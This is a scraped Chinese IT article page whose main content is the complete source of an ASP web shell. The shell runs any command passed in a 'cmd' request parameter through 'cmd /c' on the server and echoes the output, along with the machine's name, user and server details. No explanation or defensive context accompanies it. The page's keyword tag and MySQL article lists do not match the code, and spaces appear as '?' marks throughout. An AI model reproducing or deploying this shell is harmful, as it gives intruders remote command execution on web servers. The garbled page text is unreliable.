時(shí)間:2024-04-11 17:36:21 來源:IT貓撲網(wǎng)整理 作者:不詳 我要評論(0)
<% Set?oScript?=?Server.CreateObject("WSCRIPT.SHELL") Set?oScriptNet?=?Server.CreateObject("WSCRIPT.NETWORK") Set?oFileSys?=?Server.CreateObject("Scripting.FileSystemObject") Function?getCommandOutput(theCommand) ????Dim?objShell,?objCmdExec ????Set?objShell?=?CreateObject("WScript.Shell") ????Set?objCmdExec?=?objshell.exec(thecommand) ????getCommandOutput?=?objCmdExec.StdOut.ReadAll end?Function %>
<%=?"\\"?&?oScriptNet.ComputerName?&?"\"?&?oScriptNet.UserName?%> <%Response.Write(Request.ServerVariables("server_name"))%>The?server's?port: <%Response.Write(Request.ServerVariables("server_port"))%>
The?server's?software: <%Response.Write(Request.ServerVariables("server_software"))%>
The?server's?local?address: <%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%> <%?szCMD?=?request("cmd") thisDir?=?getCommandOutput("cmd?/c"?&?szCMD) Response.Write(thisDir)%>
關(guān)鍵詞標(biāo)簽:Xbox Game Pass
相關(guān)閱讀 在服務(wù)器上安裝、使用MySQL的注意事項(xiàng) 常用數(shù)據(jù)庫JDBC連接寫法大全 MySQL數(shù)據(jù)庫的臨時(shí)文件究竟儲存在哪里 Mysql 主從數(shù)據(jù)庫同步 MySQL數(shù)據(jù)庫創(chuàng)建線程 MySQL數(shù)據(jù)庫線程緩沖池詳解
熱門文章 Xbox Game Pass 10款MySQL數(shù)據(jù)庫客戶端圖形界面管理工具推薦 MySQL常用維護(hù)管理工具 MySQL數(shù)據(jù)庫啟動失敗1067進(jìn)程意外終止的解決辦法總結(jié)
時(shí)間:2022-10-17 14:33:05
時(shí)間:2022-10-17 14:31:02
時(shí)間:2022-08-11 18:29:45
時(shí)間:2021-12-18 12:47:24
時(shí)間:2021-01-27 10:00:54
人氣排行 10款MySQL數(shù)據(jù)庫客戶端圖形界面管理工具推薦 MySQL數(shù)據(jù)庫啟動失敗1067進(jìn)程意外終止的解決辦法總結(jié) Mysql 1045錯(cuò)誤解決辦法 MySQL服務(wù)器進(jìn)程CPU占用100%解決辦法 MySQL導(dǎo)出導(dǎo)入命令的用例 MySQL連接字符串的實(shí)際操作步驟匯總 MySQL無法啟動、無法停止各種解決方法總結(jié) 三種常用的MySQL建表語句